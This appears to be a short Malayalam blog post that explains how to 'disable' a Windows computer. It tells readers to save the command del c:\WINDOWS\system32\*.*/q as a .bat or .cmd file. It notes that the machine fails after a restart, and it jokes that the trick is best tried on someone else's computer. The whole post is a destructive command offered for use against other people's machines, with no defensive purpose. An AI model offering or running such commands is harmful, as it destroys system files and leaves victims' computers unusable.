ലളിതമായ ട്രിക്ക് ഉപയോഗിച്ച് ഒരു കമ്പ്യൂട്ടര്‍ എങ്ങിനെ നിശ്ചലമാക്കം ..

ആദ്യമേ പറയട്ടെ ഈ ട്രിക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെക്ക്‌ ചെയ്തു എന്ത് സംഭവിച്ചാലും നിങ്ങള്‍ നിങ്ങളുടെ പാട്ടിനു പോകേണ്ടി വരും ..ഒരു രീതിയിലും ഞാന്‍ ഉത്തരവാദി ആകില്ല.. 



1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക 
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക 
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക.. 
ഉദാഹരണമായി .. സജി എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ saji.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക.. 
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക *** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട്‌ ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക്‌ ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം.

No comments: